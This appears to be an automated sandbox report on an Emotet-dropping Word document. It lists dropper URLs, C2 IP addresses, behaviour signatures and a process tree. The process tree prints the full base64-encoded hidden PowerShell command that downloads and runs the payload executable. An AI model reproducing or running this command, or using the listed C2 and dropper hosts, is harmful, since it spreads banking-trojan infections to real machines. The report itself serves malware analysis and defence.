Analysis

  • max time kernel
    28s
  • resource
    win10v191014
  • submitted
    28-01-2020 01:53

General

  • Target

    5db4c76eff6ffcc419e3775b734cfd1803ceeeecb4249a69d40c6ee435ca03e1.doc

  • Sample

    200128-zbjvvq4axs

  • SHA256

    5db4c76eff6ffcc419e3775b734cfd1803ceeeecb4249a69d40c6ee435ca03e1

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://covaihomes.com/cgi-bin/t3ln/

exe.dropper

http://saxseafood.com/wp-content/VHTlLciKX/

exe.dropper

https://zaamira.com/wp-admin/2sof7o/

exe.dropper

https://shopify-ed.apps.zeroek.com/dist/hxrf9/

exe.dropper

https://sophistproduction.com/wp-includes/Wijy9/

Extracted

Family

emotet

C2

207.177.72.129:8080

23.243.215.4:8080

218.255.173.106:80

136.243.205.112:7080

23.92.16.164:8080

45.55.65.123:8080

217.160.19.232:8080

64.66.6.71:8080

66.34.201.20:7080

85.152.174.56:80

202.175.121.202:8090

87.106.139.101:8080

176.9.43.37:8080

98.156.206.153:80

159.65.25.128:8080

70.184.9.39:8080

209.146.22.34:443

95.213.236.64:8080

98.30.113.161:80

59.103.164.174:80

rsa_pubkey.plain

Signatures

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Drops file in System32 directory 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5db4c76eff6ffcc419e3775b734cfd1803ceeeecb4249a69d40c6ee435ca03e1.doc" /o ""
    1⤵
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Checks processor information in registry
    • Suspicious use of SetWindowsHookEx
    PID:4852
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABQAHAAZgBnAGkAbgBkAHcAaABtAHcAPQAnAEIAbgBsAHcAYwBkAGQAcwBmAHUAJwA7ACQAWAB4AGgAawB0AHIAZgB1AHgAcQBiACAAPQAgACcAOAA4ADEAJwA7ACQARwB2AG0AbQBkAGQAZwB6AGQAbQB6AGIAegA9ACcAUgBwAGwAawB4AGgAcAByAGkAYQAnADsAJABUAGUAdABxAHMAYwBmAGkAaABjAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABYAHgAaABrAHQAcgBmAHUAeABxAGIAKwAnAC4AZQB4AGUAJwA7ACQASgB5AGoAdgBpAGsAagBoAGkAawB2AGoAcwA9ACcAWQBiAGwAdgBkAG8AcQBhAHAAagAnADsAJABIAGgAeAByAGkAawBtAGEAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AdwBlAGIAQwBMAGkARQBOAHQAOwAkAEQAcgBnAGIAZwBjAHUAcQBxAD0AJwBoAHQAdABwADoALwAvAGMAbwB2AGEAaQBoAG8AbQBlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwB0ADMAbABuAC8AKgBoAHQAdABwADoALwAvAHMAYQB4AHMAZQBhAGYAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBWAEgAVABsAEwAYwBpAEsAWAAvACoAaAB0AHQAcABzADoALwAvAHoAYQBhAG0AaQByAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADIAcwBvAGYANwBvAC8AKgBoAHQAdABwAHMAOgAvAC8AcwBoAG8AcABpAGYAeQAtAGUAZAAuAGEAcABwAHMALgB6AGUAcgBvAGUAawAuAGMAbwBtAC8AZABpAHMAdAAvAGgAeAByAGYAOQAvACoAaAB0AHQAcABzADoALwAvAHMAbwBwAGgAaQBzAHQAcAByAG8AZAB1AGMAdABpAG8AbgAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AVwBpAGoAeQA5AC8AJwAuACIAcwBgAHAATABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABRAHEAZABkAGwAcABmAHcAYgB0AHIAcgByAD0AJwBFAGcAdQBiAHIAcgB3AHIAcQAnADsAZgBvAHIAZQBhAGMAaAAoACQARgB1AGcAYwBzAGUAZwBzAHgAYgAgAGkAbgAgACQARAByAGcAYgBnAGMAdQBxAHEAKQB7AHQAcgB5AHsAJABIAGgAeAByAGkAawBtAGEALgAiAEQATwBgAFcATgBMAE8AYQBgAEQAZgBpAEwARQAiACgAJABGAHUAZwBjAHMAZQBnAHMAeABiACwAIAAkAFQAZQB0AHEAcwBjAGYAaQBoAGMAKQA7ACQASwBrAHMAeAB0AG0AdwBtAHMAPQAnAEgAagB1AG4AagBrAGUAawB1ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJACcAKwAnAHQAZQBtACcAKQAgACQAVABlAHQAcQBzAGMAZgBpAGgAYwApAC4AIgBMAGUAbgBHAGAAVABIACIAIAAtAGcAZQAgADIAMwAwADUAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYQBgAFIAdAAiACgAJABUAGUAdABxAHMAYwBmAGkAaABjACkAOwAkAE0AdQB2AGgAdQBoAHUAeQBtAD0AJwBFAHYAZABkAHoAZQB1AGYAeAAnADsAYgByAGUAYQBrADsAJABaAGsAaABlAGgAbABtAGcAPQAnAFcAZABnAGQAeQBlAGMAZQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABSAGMAZABwAHMAZwBnAGUAZgBhAHkAcQA9ACcAVQBsAHoAcAB6AGkAbQBnAGMAZAAnAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Users\Admin\881.exe
      "C:\Users\Admin\881.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4548
      • C:\Users\Admin\881.exe
        --bf0d2c8f
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Suspicious use of SetWindowsHookEx
        • Drops file in System32 directory
        PID:4612

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\881.exe

  • C:\Users\Admin\881.exe

  • C:\Users\Admin\881.exe

  • memory/4548-8-0x00000000021D0000-0x00000000021E5000-memory.dmp

    Filesize

    84KB

  • memory/4612-10-0x0000000001F90000-0x0000000001FA5000-memory.dmp

    Filesize

    84KB

  • memory/4612-11-0x0000000000400000-0x0000000000463000-memory.dmp

    Filesize

    396KB